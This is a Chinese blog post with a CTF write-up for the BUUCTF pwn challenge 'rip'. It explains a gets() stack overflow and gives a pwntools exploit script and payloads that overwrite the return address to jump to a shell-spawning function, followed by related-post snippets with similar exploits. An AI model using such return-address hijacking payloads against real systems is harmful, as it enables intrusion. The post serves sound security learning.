BUUCTF (PWN) RIP详细分析

最新推荐文章于 2025-03-27 20:45:59 发布
最新推荐文章于 2025-03-27 20:45:59 发布
阅读量1.7w 收藏 36
点赞数 24
分类专栏: BUUCTF PWN刷题 文章标签: pwn2own python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qy201706/article/details/105397766
版权
本文解析了一道在64位Ubuntu18系统上运行的CTF题目,详细介绍了如何利用栈溢出漏洞,通过分析IDA中main函数下的fun()函数,构造payload实现函数返回地址的劫持。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨

0x1 解题过程

由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的题都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~

IDA打开发现main下面还有一个fun()函数,很可疑
IDA打开发现main下面还有一个fun()函数,很可疑

别一味地F5,这个汇编很容易看明白,这个gets很明显没有限制输入,存在栈溢出漏洞
在这里插入图片描述

双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址
在这里插入图片描述

因此再回来看fun()函数,就是一个系统调用,故payload=‘a’ * 15 + p64(0x401186)
在这里插入图片描述

0x2:exp

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#p = process('./pwn1')
p = remote('node3.buuoj.cn', 26692)

#p.recvuntil("please input") 这道题不知道为啥recvuntil报连接超时。。
#buf = 'a' * (0xf + 0x8) + p64(0x401198) + p64(0x401186) 也可以,是网上wp的修改
buf_1 = 'a' * 15 + p64(0x401186)
#gdb.attach(p)

p.sendline(buf_1)

p.interactive()

0x03反思:

看了网上那些wp,其实就是老版本的这道题是32位的,而现在是64位的,参数小于6个不会用到栈来传参。而gets()只有一个参数,所以传递参数只需用到rdi(这你可以看ida的汇编代码,call下面有个mov rdi,rax),这道题的s应该是一个局部变量,23个刚刚覆盖了rbp,然后那两个地址紧接着往下排,0x401198是 “retn” 保证程序能正常返回,然后0x401186在Main函数栈顶。又因为retn相当于pop + 执行,故形成了返回地址劫持~~
解决办法:payload=‘a’ * 23+ p64(0x401198) + p64(0x401186) #0x401198为返回地址
在这里插入图片描述

大神帮忙看看我这个反思是否正确,望指点~

BUUCTFPwnrip 解题步骤
2301_81505831的博客
01-25 1058
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2816
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
buuctf靶场新手题解
最新发布
2401_87508420的博客
03-27 1023
进入发现文件包含漏洞,尝试读取index.php发现没有什么用开始尝试,发现返回到根目录下存在flag文件远程包含。
pwn基础入门-buuctf-2.rip
weixin_49765221的博客
05-21 1478
将下载下来的pwn1文件内容,放到ubuntu中checksec一下。
BUUCTF-Pwn-rip
餐桌上的猫
11-14 2944
题目截图 使用IDA打开附件,反汇编为C语言找到两个函数 可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节 所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186 所以我们可以构造payload=‘a’*23+
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 566
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5972
BUU CTF PWN 入门知识详解
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 796
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1291
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2883
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF pwn rip
weixin_55190422的博客
11-03 426
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1698
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
buuctf pwn rip
03-14
### BUUCTF Pwn 题目中 RIP 寄存器的利用方法 在处理像 `bjdctf_2020_babystack2` 这样的题目时,RIP(指令指针寄存器)控制是实现任意代码执行的关键[^1]。通常情况下,攻击者会通过覆盖返回地址来重定向程序流。 ...
BUUCTF - PWNrip
古月浪子的博客
03-19 1720
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
BUUCTF-rip
m0_64180167的博客
04-11 726
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
[每日一PWN]BUUCTF RIP
qq_55233040的博客
11-19 334
比赛隐身,反思结束,从头详细记录一下,每日记录一题,第一题的nc就不用记了,所以直接从第二题rip开始。
BUUCTFrip
^_^
12-08 3433
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTF -rip
weixin_56301399的博客
07-20 486
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
评论 27
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值